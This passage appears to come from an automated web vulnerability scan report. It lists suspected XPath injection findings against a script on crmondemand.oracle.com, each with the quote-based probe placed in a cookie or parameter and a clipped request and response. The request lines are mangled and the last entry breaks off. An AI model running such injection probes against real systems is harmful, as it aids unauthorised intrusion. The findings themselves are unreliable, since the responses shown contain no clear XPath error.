/ocom/resources/sitestudio/ssajax/ssajax.js
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /ocom/resources/sitestudio/ssajax/ssajax.js?1%2527 =1 HTTP/1.1.com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK379100"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (M;max-age=300+0;age=0;ecid=49403138087297606,0:1)////////////////////////////////////////////////////...[SNIP]... .hasFeature;MENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;XPATH _LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");****************************************************...[SNIP]...
2.8. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [p_cur_URL cookie]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://crmondemand.oracle.com
Path:
/ocom/resources/sitestudio/ssajax/ssajax.js
Issue detail
The p_cur_URL cookie appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the p_cur_URL cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1.com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233%2527 ; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK379100"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=23;ecid=49401733632975001,0:1)////////////////////////////////////////////////////...[SNIP]... .hasFeature;MENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;XPATH _LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");****************************************************...[SNIP]...
2.9. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [p_lang cookie]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://crmondemand.oracle.com
Path:
/ocom/resources/sitestudio/ssajax/ssajax.js
Issue detail
The p_lang cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the p_lang cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1.com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US' ; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK379100"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=24;ecid=49937238745376215,0:1)////////////////////////////////////////////////////...[SNIP]... .hasFeature;MENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;XPATH _LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");****************************************************...[SNIP]...
2.10. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [p_org_id cookie]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://crmondemand.oracle.com
Path:
/ocom/resources/sitestudio/ssajax/ssajax.js
Issue detail
The p_org_id cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the p_org_id cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1.com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001' ; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK379100"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=99;ecid=49714579050815798,0:1)////////////////////////////////////////////////////...[SNIP]... .hasFeature;MENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;XPATH _LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");****************************************************...[SNIP]...
2.11. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_cc cookie]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://crmondemand.oracle.com
Path:
/ocom/resources/sitestudio/ssajax/ssajax.js
Issue detail
The s_cc cookie appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the s_cc cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1.com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true%2527 ; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK379100"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=108;ecid=49715287720427927,0:1)////////////////////////////////////////////////////...[SNIP]... .hasFeature;MENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;XPATH _LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");****************************************************...[SNIP]...
2.12. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_nr cookie]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://crmondemand.oracle.com
Path:
/ocom/resources/sitestudio/ssajax/ssajax.js
Issue detail
The s_nr cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_nr cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1.com/en/index.htm;q=0.3' ; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK379100"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=22;ecid=49937101306421007,0:1)////////////////////////////////////////////////////...[SNIP]... .hasFeature;MENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;XPATH _LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");****************************************************...[SNIP]...
2.13. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_nr6 cookie]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://crmondemand.oracle.com
Path:
/ocom/resources/sitestudio/ssajax/ssajax.js
Issue detail
The s_nr6 cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_nr6 cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1.com/en/index.htm;q=0.3' ; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK379100"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=21;ecid=49937002522171970,0:1)////////////////////////////////////////////////////...[SNIP]... .hasFeature;MENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;XPATH _LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");****************************************************...[SNIP]...
2.14. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_pers cookie]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://crmondemand.oracle.com
Path:
/ocom/resources/sitestudio/ssajax/ssajax.js
Issue detail
The s_pers cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_pers cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1.com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B' ; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK379100"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=27;ecid=49937449198776511,0:1)////////////////////////////////////////////////////...[SNIP]... .hasFeature;MENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;XPATH _LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");****************************************************...[SNIP]...
2.15. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_sess cookie]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://crmondemand.oracle.com
Path:
/ocom/resources/sitestudio/ssajax/ssajax.js
Issue detail
The s_sess cookie appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the s_sess cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1.com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B%00' ; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK379100"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=28;ecid=49937573752829502,0:1)////////////////////////////////////////////////////...[SNIP]... .hasFeature;MENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;XPATH _LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");****************************************************...[SNIP]...
2.16. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_sq cookie]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://crmondemand.oracle.com
Path:
/ocom/resources/sitestudio/ssajax/ssajax.js
Issue detail
The s_sq cookie appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the s_sq cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1.com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON%00'
Response
HTTP/1.1 200 OK379100"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=115;ecid=49715983505137825,0:1)////////////////////////////////////////////////////...[SNIP]... .hasFeature;MENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;XPATH _LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");****************************************************...[SNIP]...
2.17. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_wgw_lv cookie]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://crmondemand.oracle.com
Path:
/ocom/resources/sitestudio/ssajax/ssajax.js
Issue detail
The s_wgw_lv cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_wgw_lv cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1.com/en/index.htm;q=0.3' ; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
